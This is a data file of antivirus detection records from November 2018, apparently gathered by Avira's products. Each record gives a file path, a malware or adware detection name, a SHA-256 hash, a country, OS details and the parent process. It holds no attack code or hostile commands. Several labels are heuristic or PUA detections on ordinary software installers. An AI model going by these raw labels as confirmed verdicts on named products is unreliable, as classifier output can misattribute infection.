  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_windowssearchengine_31bf3856ad364e35_7.0.7601.17514_none_75618ca379b78941\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='0ebc7b2c2e54fa07ef88562ec2ffeb2c6320ee013de351ea464cd8b8e1c7ff8b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:33:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155217-9c43063a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155217-9C43063A', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-27-21-48-58.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T23:43:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{437149C2-7CB7-40D9-B0F5-9D418878CB4F}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='a52153d1258053141c602709f13091e0d88d222b27fae0267e45dc4cb0901351', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111740-2d4044b8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111740-2D4044B8', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:17:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142852-2301e46b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0916e0be\\AVSCAN-20181101-142705-187CF917\\AVSCAN-20181101-142852-2301E46B', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-164222-2ba23f74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_85699471\\AVSCAN-20181101-160404-9B7043B4\\AVSCAN-20181101-164222-2BA23F74', filesize=704000, name='Adware/Graftor.146103.#M1.#R1'), hash='724aa7342774c984868fe7c6aa396db464de9dcdfbce990b3811b7dbe2dfc1a1', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:42:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T00:51:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pconverter.7b4b54ea461842f6af64f10f41f9804a.exe', filepath='C:\\Users\\X\\Downloads\\PConverter.7b4b54ea461842f6af64f10f41f9804a.exe', filesize=376000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='a36c690c41d2651fe6a2e5f9d785ac213521e3b62107bb5a7b6b4ee4372a5b75', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T10:14:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aamlauncher.exe', filepath='C:\\Program Files (x86)\\Common Files\\Adobe\\OOBE\\PDApp\\UWA\\AAMLauncher.exe', filesize=524000, name='W32/Sality.AT.#M1.#R1'), hash='699f0ef2a4b2d24cfa7030112359ac670dc0b8016ba1d76c2630effef1570dc9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:27:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ts_contf.exe', filepath='D:\\TechnoSchool\\TS_prog\\prog_tf\\ts_contf.exe', filesize=40512000, name='W32/Sality.AT.#M1.#R1'), hash='ed9e06530d5d4573ede78e82be72fcf862ce0b63b8d10403ad1d3b2526523c71', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:FC9Q91pyq0y8HAN2.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T08:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msiexec64.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Canon Network Tool_rt\\MSiEXEc64.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:33:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-144200-c93151bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_134a0728\\AVSCAN-20181101-144142-C719DF7F\\AVSCAN-20181101-144200-C93151BD', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:41:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c0232c16d0f27c920c61135b153ab65a121b2b3362d47231660943712472a96d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C0232C16D0F27C920C61135B153AB65A121B2B3362D47231660943712472A96D', filesize=2816000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='c0232c16d0f27c920c61135b153ab65a121b2b3362d47231660943712472a96d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:50:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.google.android.youtube.exe', filepath='G:\\Android\\data\\com.google.android.youtube.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165656-4b0686fd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e31654db\\AVSCAN-20181101-165639-489C2D49\\AVSCAN-20181101-165656-4B0686FD', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='ca23ef36c43d02666fa97ca6e35451e5d9937aab0f778200aad1f8d7a2736b7e', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:57:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110336-c2d0c9dd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110336-C2D0C9DD', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:03:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e135c39ae7b87cb6e64b2b8de29e64be1ec0e38ee85c0b46c5038cabb202eda3.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E135C39AE7B87CB6E64B2B8DE29E64BE1EC0E38EE85C0B46C5038CABB202EDA3.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e135c39ae7b87cb6e64b2b8de29e64be1ec0e38ee85c0b46c5038cabb202eda3', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:16:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-210733-be63c78a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_c35755c0\\AVSCAN-20181101-205617-602DFCFE\\AVSCAN-20181101-210733-BE63C78A', filesize=5260000, name='PUA/EDownloader.Gen7.#M1.#R1'), hash='cd2a73795bcd963999c929a1ad3f17695eb7e5773effdc96473fca2dc8cc20de', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:37:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-005326-a5ff3c61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d4d23901\\AVSCAN-20181102-005315-A3426F3B\\AVSCAN-20181102-005326-A5FF3C61', filesize=3136000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='be57411ce50887ba2525a238649ebf3c5d31c21ff44f725b30eb7d725f8db271', metadata=Row(cmdline=None, country='SE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:53:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='94fe5caf8a8304d08653725a9d34001b6fa6b9f50e03a1538810f52a68c05ab8', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111338-0ed2024a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-111338-0ED2024A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:13:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apxkxtyquoc.dll', filepath='C:\\Windows.old\\Windows\\temp\\nskB947.tmp\\apXKXtYQUOC.dll', filesize=1152000, name='Adware/Zdengo.jplev.#M1.#R1'), hash='abd0bce4329be3cb4cdd15f863c7d30f3477d1f45065c27c9384482a6ae87134', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T10:10:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='adobe premiere pro cc 2018 12.0.0.224 x64_c2bcaee2.exe', filepath='C:\\Users\\X\\Desktop\\Adobe Premiere Pro CC 2018 12.0.0.224 x64_c2bcaee2.exe', filesize=294912000, name='HEUR/AGEN.1000587.#M1.#R1'), hash='ad89b75827d2f9c125614f4d7d18aaae981a86dde80d5763cfbeb604a624e869', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T01:16:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rbzm0k1', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RBZM0K1', filesize=64000, name='W97M/Agent.2975818.#M1.#R1'), hash='e4a5462414cfe7933695b85b5d7fe27ade4c20e376d8c1d202863f1fa3668465', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:16:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hlsrv.exe', filepath='\\\\?\\C:\\G2\\Counter-Strike 1.6\\hlSrv.exe', filesize=64000, name='TR/Crypt.XPACK.Gen.#M300.#R3769'), hash='1cba90497fecccb4be2afd31e0f8794ea23c3df658ba3da01173d9c08aded7e1', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:08:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='krc4comm.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\tools\\KRC4CommT\\KRC4Comm\\KRC4Comm.exe', filesize=192000, name='HEUR/APC.#M1.#R1'), hash='378813afcb0b1470e62cb5fb633febad686f1db0c7d8bdcb5db95287f7a063e8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T12:55:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T12:19:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\Descargas\\adobe cs6 keygen\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='D:\\Descargas\\adobe cs6 keygen\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T18:40:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res2017042888uu_new[6].exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res2017042888uu_new[6].exe', filesize=576000, name='HEUR/AGEN.1030714.#M1.#R1'), hash='2d9bffb5b2cd0a3d0251d753856f11d6b3fc6a26eedd17c9bbbefe52eafce55b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:37:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000af5eb', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000af5eb', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:51:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-124321-9b298e70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_adeb3106\\AVSCAN-20181101-124240-94CAEFE7\\AVSCAN-20181101-124321-9B298E70', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:43:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-165512-17e1e06f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-165512-17E1E06F', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:55:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tsmuxer.exe', filepath='C:\\Program Files\\FormatFactory\\FFModules\\Encoder\\tsMuxer.exe', filesize=320000, name='W32/Ramnit.CD.#M1.#R1'), hash='678d2ed0ab506f2611775ebe28f6f2b3222918655a28bee19c98f405e89351db', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:30:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{06332CB9-78B5-49D8-A9B1-18CF5E84F1B7}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='64c554850fb7cbc38bfd6ae3b355d043d0b95f1342a2a512330936a4f0302383', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='79b60c546b57a845a45b41b1c5f6af57933439927e1dcf49660b5237f9b18697', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\79B60C546B57A845A45B41B1C5F6AF57933439927E1DCF49660B5237F9B18697', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='79b60c546b57a845a45b41b1c5f6af57933439927e1dcf49660b5237f9b18697', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:26:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='4cff8aeba8b5bff8772fd3c4f06ecd12035d6c9e17fc825f5034d2cfd17d160f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_11.10.2018-40.available\\Avira\\4CFF8AEBA8B5BFF8772FD3C4F06ECD12035D6C9E17FC825F5034D2CFD17D160F', filesize=1984000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='4cff8aeba8b5bff8772fd3c4f06ecd12035d6c9e17fc825f5034d2cfd17d160f', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T10:52:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-115452-13cf1e9c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3a6478a3\\AVSCAN-20181101-114551-D907279B\\AVSCAN-20181101-115452-13CF1E9C', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:55:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered fodar', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered fodar', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='35d68f729ac3beb6920e8a8f9bd7a7ee7fb5ef5ac1761d2d1f86d580d9c4e9e0', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:11:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tripeaks.exe', filepath='\\\\?\\C:\\Program Files\\GameHouse\\AncientTripeaks\\Tripeaks.exe', filesize=3584000, name='W32/Sality.AT.#M1.#R1'), hash='426588c4fca05c6f3026baa2f3ee0a004dbf7a589ace3c1c094cc483f51b1e6a', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:47:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162738-f9c07a2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e9ec925\\AVSCAN-20181101-162536-E97165D3\\AVSCAN-20181101-162738-F9C07A2F', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-065030-8ae4a86b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_09c98039\\AVSCAN-20181101-064515-634BAC10\\AVSCAN-20181101-065030-8AE4A86B', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='53e031f603f2a79e345af0f2cd4983df7420993268f9ffeaecab054f1d9c2f96', metadata=Row(cmdline=None, country='IL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:50:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T23:33:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='igfxress.dll', filepath='C:\\Drivers\\Video\\Intel1\\HD1\\igfxress.dll', filesize=896000, name='W32/Ramnit.CD.#M1.#R1'), hash='34c52abea6bcf9d71da49d09b31f684e5066923a13b361ed4705c9c1583a5a6e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Smadav\\SMΔRTP.exe', parentsize=1675264, timestamp='2018-11-01T19:55:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T20:50:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T02:08:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002835-3a62b513', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_83a270a8\\AVSCAN-20181101-234858-E1580469\\AVSCAN-20181102-002835-3A62B513', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:28:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172829-83cd5f24', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e326dc5\\AVSCAN-20181101-172814-812922EF\\AVSCAN-20181101-172829-83CD5F24', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:28:30Z'), dt=datetime.date(2018, 11, 1)),
